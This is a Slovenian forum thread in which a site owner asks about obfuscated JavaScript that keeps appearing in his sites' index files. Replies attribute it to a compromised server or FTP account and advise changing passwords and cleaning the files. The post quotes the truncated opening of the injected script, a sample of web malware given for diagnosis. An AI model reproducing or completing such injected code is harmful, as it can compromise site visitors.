Čudna koda na mojih spletnih straneh..

4 naročniki

Kak teden nazaj sem opazil, da se mi na precej straneh pojavi neka čudna kodo.. navadno je v index fajlih in celo na straneh, kjer prevladuje čisti html, brez phpja-mysqla...

Pred dnevi sem naredil nov page (pure html), danes pa že opazim kodo.. Kdo ve zakaj hodiča gre ?

Kode nima smisla popat tukaj, ker je prdolga.. začne pa se nakako takole..

<script>function c265607b11i49b935f9bfb78(i49b935f9bff72){ function i49b935f9c036f(){return 16;} return (parseInt(i49b935f9bff72,i49b935f9c036f()));}function i49b935f9c0b68
(i49b935f9c0f68){ function i49b935f9c1b6e(){return 2;} var i4

Mogoče kakšen XSS Atack?

težko na straneh, kjer je goli html, brez form.. se mi zdi, da je en hudič na na serverju..

Vdrli so ti preko znane napake za IE strežnike. V bistvu so dobili dostop do tvojega FTP-ja. Piši hostingu za update njihovega softweara, zamenjaj vsa gesla in pobriši dodatno kodo. Itak se pojavlja čisto na dnu in samo v index fajlih.

aha hvala...bom naredil, kot si rekel..sicer pa imam za vsako domeno svoj FTP oz. password!

ampak google tega nima rad.. meni se je to zgodilo na wordpressu in sem kot keks odletel iz indeksa..

in ja, tudi "plain" html je bil okuzen :(

Mactron, če imaš vse pri enem ponudniku se je lahko zgodilo, da so dobili dostop do roota (sicer ne poznam podrobnosti).
Drugače pa, kot je rekel had, ti recimo googlov brskalnik chrom tako stran blokira. Po svoje je pohvalno, da se je Google tako hitro odzval na te vdore, saj je posledično zmanjšal število okuženih uporabnikov.